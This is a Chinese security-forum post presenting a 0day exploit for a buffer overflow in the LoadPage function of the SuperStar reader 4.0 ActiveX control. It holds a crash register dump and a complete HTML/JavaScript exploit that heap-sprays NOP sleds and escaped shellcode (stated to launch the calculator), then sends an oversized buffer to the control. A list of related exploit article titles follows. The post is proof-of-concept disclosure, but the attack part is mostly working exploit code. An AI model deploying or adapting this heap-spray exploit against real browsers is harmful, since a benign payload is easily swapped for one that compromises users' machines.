文章作者:friddy
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
注:文章首发Friddy的罐子,后由原创作者友情提交到邪恶八进制信息安全团队讨论组,转载请著名首发站点。
本文章只含有漏洞存在的证明,效果是运行计算器的程序,不含有***性代码!
去年11月出的漏洞是在target.Register(ok,buffer)上,这次的缓冲区溢出出在target.LoadPage(buffer ,1 ,1 ,1)
漏洞位置:clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2的LoadPage函数发生缓冲区溢出
漏洞告警: ACCESS_VIOLATION
Disasm: 41414141    ?????    ()

寄存器状态:

EIP 41414141
EAX BAADF000
EBX 00000000
ECX 00000000
EDX 00B36F48 -> 016E9D0C
EDI 0013E084 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESI 0013E39C -> 00000000
EBP 00B36F48 -> 016E9D0C
ESP 0013D85C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ArgDump: 
EBP+8    BAADF00D
EBP+12    00000000
EBP+16    BAADF00D
EBP+20    BAADF00D
EBP+24    BAADF00D
EBP+28    BAADF00D
Stack Dump: 
13D85C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13D86C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13D87C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13D88C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13D89C 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
漏洞利用程序: 
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></object>
<P>Made By Friddy QQ:568623
<P>[url]http://www.friddy.cn[/url]
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;//总长度
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 3092) buffer+="\x0a\x0a\x0a\x0a";
target.LoadPage(buffer ,1 ,1 ,1);//这次出问题的是LoadPage.不是Register了
</script>
***exp.rar

超星浏览器4.0漏洞0day Exp相关推荐

  1. HeapSpray+ROP绕过IE8的DEP防护 ——堆喷射技术利用超星老漏洞

    感觉写的太水了,有空一定重新写一份更详细明白的.. 堆喷射技术已经发展很多个年头了,相关的研究也挺多的,虽然现在Win7.Win8系统下的利用越来越难,但是该技术仍然是可用的,比如最近新出的IE8 u ...

  2. 超星阅读器ActiveX缓冲区溢出漏洞利用-LoadPage

    超星阅读器4.0漏洞利用过程: 1.由于是缓冲区溢出,最开始我想到的利用方式"jmp esp" 0---------------------256---------260----- ...

  3. 余承东吐槽苹果续航;微软 IE 浏览器被曝漏洞;React Native 0.61.0 发布 | 极客头条...

    快来收听极客头条音频版吧,智能播报由标贝科技提供技术支持. 「CSDN 极客头条」,是从 CSDN 网站延伸至官方微信公众号的特别栏目,专注于一天业界事报道.风里雨里,我们将每天为朋友们,播报最新鲜有 ...

  4. PageAdmin Cms V2.0 getshell 0day

    黑小子在土司公布了"PageAdmin cms getshell Oday",并给出了一个漏 洞的利用EXP.经过危险漫步在虚拟机里测试,存在漏洞的是PageAdmin Cms的次 ...

  5. 超星系统登录,信息爬取

    超星系统登录,信息爬取 经历过上一年的疫情的大学生,一部分大学生可能对超星有一个深刻的认识,而我写这个项目的想法来自我的导师,做一个可以爬取超星课程学生成绩,可以随机组卷(前提是自己题库里有题),该项 ...

  6. 超星集团武汉研发中心面试题

    超星集团武汉研发中心面试 1. 谈实习经历做了什么 2. 说一下图片的分类 (问题的内容是图片,应该不叫分类,应该说每次传图片给图片一个type) 3. 阿里云存图片的失效时间安全策略 阿里云存储的图 ...

  7. 下 文库 试读_莎莎教您怎么样下载超星全部试读图书

    莎莎教您怎么样下载超星全部试读图书 大家好 , 我叫殷素莎 . 今天莎莎教大家怎么下载超星里面 所有的试读图书 , 其实说起来这个方法没有什么技术含量的 大家打开超星的官方网站 http://book ...

  8. aspcms各版本漏洞0day集合

    admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,pass ...

  9. 计算机网络技术通识试题,超星计算机网络技术章节答案

    参考答案如下 当经济业务只涉及货币资金相互间的收付时,超星一般编制(). 计算机网节答攻击弱竞争者能更大幅度地扩大市场占有率和利润水平.( ) 若强大的竞争对手采用的是无差异性市场策略,络技企业要想打 ...

最新文章

  1. Python3中出现“No module named ‘StringIO‘
  2. Hadoop Hbase适合存储哪类数据?(转)
  3. 3.10 Spark RDD编程案例
  4. 17.异常(三)之 e.printStackTrace()介绍
  5. java jxta_JXTA——JAVA P2P网络编程技术(入门篇) | 学步园
  6. Python爬虫入门教程21:文档的爬取
  7. SI4463低功耗测试-STC单片机一样可以超低功耗
  8. maven命令指定配置文件
  9. IOS开发之——数据库-Couchbase(05)
  10. P2P网贷黎明前夕的黑夜---P2P是否要被封杀呢
  11. 基尼系数,excel计算方法
  12. Ansible中的jinjia2模板
  13. Fiddler设置服务代理后手机不能上网的问题
  14. 如何保持精力充沛_在家工作,如何管理一支精力充沛,精力充沛的日常团队,远程站起来...
  15. LoRa学习<二>:Rx Duty Cycle模式实验
  16. 如何学计算机打字,电脑怎么学打字
  17. android l fox x86,【原创】X61T笔触(无手触)安卓(X86)系统真正完美
  18. C++ primer (5th) 随想与学习笔记 6 优先级晦涩难通 新标准更清晰
  19. iPhone突然掉电快是什么情况,该如何解决?
  20. ubuntu解决 Can‘t locate Time/HiRes.pm in @INC 安装Time::HiRes教程

热门文章

  1. 阅读笔记:What Uncertainties Do We Need in Bayesian Deep Learning for Computer Vision?
  2. Kotlin使用泛型搭建一个MVP最简单实例
  3. 服务器托管是什么?需要注意哪些问题?
  4. 天天动听皮肤、歌手头像、字体等的使用方法
  5. Win11 没有磁盘清理工具,如何清理磁盘旧的windows.old文件
  6. 常见的监控摄像机的取流格式
  7. 为了搞明白统计套利,从两组序列之间的关系说起
  8. 小程序发送通知-可重复多次发送
  9. pandas中DataFrame可视化之画多图的方法小结
  10. oracle安装没有scott,Oracle安装时忘记解锁scott用户的解决方案